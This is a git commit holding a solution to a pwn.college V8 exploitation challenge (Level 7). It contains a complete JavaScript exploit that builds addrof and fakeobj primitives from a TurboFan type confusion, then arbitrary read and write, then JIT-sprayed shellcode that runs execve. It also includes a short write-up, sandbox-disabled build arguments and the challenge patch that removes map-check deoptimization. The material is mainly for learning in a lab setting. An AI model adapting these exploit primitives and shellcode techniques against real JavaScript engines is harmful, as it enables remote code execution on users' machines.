Level 7 of PwnCollegeV8Exploitation

This commit is contained in:
Jack Ren
2024-09-16 19:18:58 +08:00
parent 05e60b9cef
commit ef1d3be1ca
5 changed files with 262 additions and 0 deletions

View File

@@ -0,0 +1,161 @@
let ab = new ArrayBuffer(8);
let f64a = new Float64Array(ab, 0, 1);
let i32a = new Uint32Array(ab, 0, 2);
let si32a = new Int32Array(ab, 0, 2);
let bi64a = new BigUint64Array(ab, 0, 1);
function c2f(low, high) { // combined (two 4 bytes) word to float
i32a[0] = low;
i32a[1] = high;
return f64a[0];
}
function b2f(v) { // bigint to float
bi64a[0] = v;
return f64a[0];
}
function f2b(v) { // float to bigint
f64a[0] = v;
return bi64a[0];
}
function unptr(v) {
return v & 0xfffffffe;
}
function ptr(v) {
return v | 1;
}
function shellcode() { // Promote to ensure not GC during training
// JIT spray machine code form of `execve("catflag", NULL, NULL)`
return [1.9995716422075807e-246, 1.9710255944286777e-246, 1.97118242283721e-246, 1.971136949489835e-246, 1.9711826272869888e-246, 1.9711829003383248e-246, -9.254983612527998e+61];
}
for (let i = 0; i < 1000; i++) shellcode(); // Trigger MAGLEV compilation
function GetAddressOf(obj) {
let trigger_flag;
let arr;
function transition() {
if (trigger_flag)
arr[1] = obj; // Trigger transition from PACKED_DOUBLE_ELEMENTS to PACKED_ELEMENTS for `arr`
}
// %NeverOptimizeFunction(transition); // Prevents `transition` from inline
function opt(arr, i) {
for (let i = 0; i < 1000000; i++); // Make `opt` TURBOFAN compiled
arr[0] = 1.1;
if (trigger_flag || i < 10) // This will keep `transition` cold, which prevents `transition` from inline
transition();
return arr[0];
}
trigger_flag = false;
for (let i = 0; i < 1000; i++) {
arr = [1.1, 2.2];
opt(arr, i);
}
// %DebugPrint(opt);
trigger_flag = true;
arr = [1.1, 2.2];
f64a[0] = opt(arr, 0);
return unptr(i32a[1]);
}
function GetFakeObject(addr) {
let trigger_flag;
let arr;
function transition() {
if (trigger_flag)
arr[1] = {}; // Trigger transition from PACKED_DOUBLE_ELEMENTS to PACKED_ELEMENTS for `arr`
}
// %NeverOptimizeFunction(transition); // Prevents `transition` from inline
function opt(arr, i) {
for (let i = 0; i < 1000000; i++); // Make `opt` TURBOFAN compiled
arr[0] = 1.1;
if (trigger_flag || i < 10) // This will keep `transition` cold, which prevents `transition` from inline
transition();
arr[0] = c2f(ptr(addr), 0);
}
trigger_flag = false;
for (let i = 0; i < 1000; i++) {
arr = [1.1, 2.2];
opt(arr, i);
}
// %DebugPrint(opt);
trigger_flag = true;
arr = [1.1, 2.2];
opt(arr, 0);
return arr[0];
}
// let x = {};
// %DebugPrint(x);
// console.log(GetAddressOf(x).toString(16));
// %DebugPrint(GetFakeObject(0xffff0000));
// Create a PACKED_DOUBLE_ELEMENTS array contains faked PACKED_DOUBLE_ELEMENTS array
// map, properties, elements, length --- first three field are static roots
var arr = [c2f(0x001cb7f9, 0x00000725), c2f(0x00000725, 0x00008000)];
// %DebugPrint(arr);
// %SystemBreak();
var arr_addr = GetAddressOf(arr);
console.log("Address of arr: " + arr_addr.toString(16));
var fakearr = GetFakeObject(arr_addr + 0x54); // Heap Fengshui
// %DebugPrint(fakearr);
// %SystemBreak();
// QWORD Aligned
function ArbRead64(cage_addr) { // int32
if (cage_addr & 0x7) throw new Error("Must QWORD Aligned");
arr[1] = c2f(ptr(cage_addr - 0x8), 0x00008000);
let result = f2b(fakearr[0]);
console.log(`ArbRead64 ${cage_addr.toString(16)}: ${result.toString(16)}`);
return result;
}
// QWORD Aligned
function ArbWrite64(cage_addr, value) { // int32, bigint
if (cage_addr & 0x7) throw new Error("Must QWORD Aligned");
arr[1] = c2f(ptr(cage_addr - 0x8), 0x00008000);
let written = b2f(value);
fakearr[0] = written;
console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${value.toString(16)}`);
}
// DWORD Aligned
function ArbRead32(cage_addr) { // int32 -> int32
if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
bi64a[0] = ArbRead64(cage_addr & 0xfffffff8);
let result = i32a[(cage_addr & 0x4) >> 2];
console.log(`ArbRead32 ${cage_addr.toString(16)}: ${result.toString(16)}`);
return result;
}
// DWORD Aligned
function ArbWrite32(cage_addr, value) { // int32, int32 -> void
if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
let QWORD_Aligned_cage_addr = cage_addr & 0xfffffff8;
bi64a[0] = ArbRead64(QWORD_Aligned_cage_addr);
i32a[(cage_addr & 0x4) >> 2] = value;
ArbWrite64(QWORD_Aligned_cage_addr, bi64a[0]);
console.log(`ArbWrite32 ${cage_addr.toString(16)}: ${value.toString(16)}`);
}
let shellcode_addr = GetAddressOf(shellcode);
console.log("Address of shellcode: " + shellcode_addr.toString(16));
// %DebugPrint(shellcode);
// %SystemBreak();
let code_addr = unptr(ArbRead32(shellcode_addr + 0xC));
console.log("Address of code: " + code_addr.toString(16));
let instruction_start_addr = code_addr + 0x14;
let instruction_start = ArbRead32(instruction_start_addr);
console.log("instruction_start: " + instruction_start.toString(16));
ArbWrite32(instruction_start_addr, instruction_start + 0x6B);
shellcode();

View File

@@ -0,0 +1,18 @@
# Level 7
## Problem
Patch deleted all `Deoptimize` calling for `CheckMaps` in Machine Lowering phase of TurboShaft, which means TurboFan generated JITed code won't bail out if object's map is wrong.
## Key Knowledge
- What does Machine Lowering phase in TurboShaft do?
> [MachineLoweringReducer, formerly known as EffectControlLinearizer, lowers simplified operations to machine operations.](https://source.chromium.org/chromium/v8/v8.git/+/5a2307d0f2c5b650c6858e2b9b57b335a59946ff:src/compiler/turboshaft/machine-lowering-reducer-inl.h;l=43)
- [V8 Turbolizer](https://github.com/v8/v8/tree/main/tools/turbolizer) for debugging
- Turbolizer is a HTML-based tool that visualizes optimized code along the various phases of Turbofan's optimization pipeline, allowing easy navigation between source code, Turbofan IR graphs, scheduled IR nodes and generated assembly code.
- [Online V8 Turbolizer](https://v8.github.io/tools/head/turbolizer/index.html)
- [V8 Native Syntax List](https://source.chromium.org/chromium/v8/v8.git/+/5a2307d0f2c5b650c6858e2b9b57b335a59946ff:src/runtime/runtime.h;l=494)
- How to ensure a function is not inline or optimized compiled?
- Native Syntax: `%NeverOptimizeFunction(func);`
- No Native Syntax: Reduce the function's execution time.
- Having patience and perseverance, persistently trying after failure!

View File

@@ -0,0 +1 @@
5a2307d0f2c5b650c6858e2b9b57b335a59946ff

View File

@@ -0,0 +1,10 @@
is_component_build = false
is_debug = false
target_cpu = "x64"
v8_enable_sandbox = false
v8_enable_backtrace = true
v8_enable_disassembler = true
v8_enable_object_print = true
dcheck_always_on = false
use_goma = false
v8_code_pointer_sandboxing = false

View File

@@ -0,0 +1,72 @@
diff --git a/src/compiler/turboshaft/machine-lowering-reducer-inl.h b/src/compiler/turboshaft/machine-lowering-reducer-inl.h
index 170db78717b..17b0fe5c4e9 100644
--- a/src/compiler/turboshaft/machine-lowering-reducer-inl.h
+++ b/src/compiler/turboshaft/machine-lowering-reducer-inl.h
@@ -2740,7 +2740,7 @@ class MachineLoweringReducer : public Next {
const ZoneRefSet<Map>& maps, CheckMapsFlags flags,
const FeedbackSource& feedback) {
if (maps.is_empty()) {
- __ Deoptimize(frame_state, DeoptimizeReason::kWrongMap, feedback);
+ //__ Deoptimize(frame_state, DeoptimizeReason::kWrongMap, feedback);
return {};
}
@@ -2749,14 +2749,14 @@ class MachineLoweringReducer : public Next {
IF_NOT (LIKELY(CompareMapAgainstMultipleMaps(heap_object_map, maps))) {
// Reloading the map slightly reduces register pressure, and we are on a
// slow path here anyway.
- MigrateInstanceOrDeopt(heap_object, __ LoadMapField(heap_object),
- frame_state, feedback);
- __ DeoptimizeIfNot(__ CompareMaps(heap_object, maps), frame_state,
- DeoptimizeReason::kWrongMap, feedback);
+ //MigrateInstanceOrDeopt(heap_object, __ LoadMapField(heap_object),
+ // frame_state, feedback);
+ //__ DeoptimizeIfNot(__ CompareMaps(heap_object, maps), frame_state,
+ // DeoptimizeReason::kWrongMap, feedback);
}
} else {
- __ DeoptimizeIfNot(__ CompareMaps(heap_object, maps), frame_state,
- DeoptimizeReason::kWrongMap, feedback);
+ //__ DeoptimizeIfNot(__ CompareMaps(heap_object, maps), frame_state,
+ // DeoptimizeReason::kWrongMap, feedback);
}
// Inserting a AssumeMap so that subsequent optimizations know the map of
// this object.
diff --git a/src/d8/d8.cc b/src/d8/d8.cc
index facf0d86d79..382c015bc48 100644
--- a/src/d8/d8.cc
+++ b/src/d8/d8.cc
@@ -3364,7 +3364,7 @@ Local<FunctionTemplate> Shell::CreateNodeTemplates(
Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
Local<ObjectTemplate> global_template = ObjectTemplate::New(isolate);
- global_template->Set(Symbol::GetToStringTag(isolate),
+/* global_template->Set(Symbol::GetToStringTag(isolate),
String::NewFromUtf8Literal(isolate, "global"));
global_template->Set(isolate, "version",
FunctionTemplate::New(isolate, Version));
@@ -3385,13 +3385,13 @@ Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
global_template->Set(isolate, "readline",
FunctionTemplate::New(isolate, ReadLine));
global_template->Set(isolate, "load",
- FunctionTemplate::New(isolate, ExecuteFile));
+ FunctionTemplate::New(isolate, ExecuteFile));*/
global_template->Set(isolate, "setTimeout",
FunctionTemplate::New(isolate, SetTimeout));
// Some Emscripten-generated code tries to call 'quit', which in turn would
// call C's exit(). This would lead to memory leaks, because there is no way
// we can terminate cleanly then, so we need a way to hide 'quit'.
- if (!options.omit_quit) {
+/* if (!options.omit_quit) {
global_template->Set(isolate, "quit", FunctionTemplate::New(isolate, Quit));
}
global_template->Set(isolate, "testRunner",
@@ -3410,7 +3410,7 @@ Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
if (i::v8_flags.expose_async_hooks) {
global_template->Set(isolate, "async_hooks",
Shell::CreateAsyncHookTemplate(isolate));
- }
+ }*/
return global_template;
}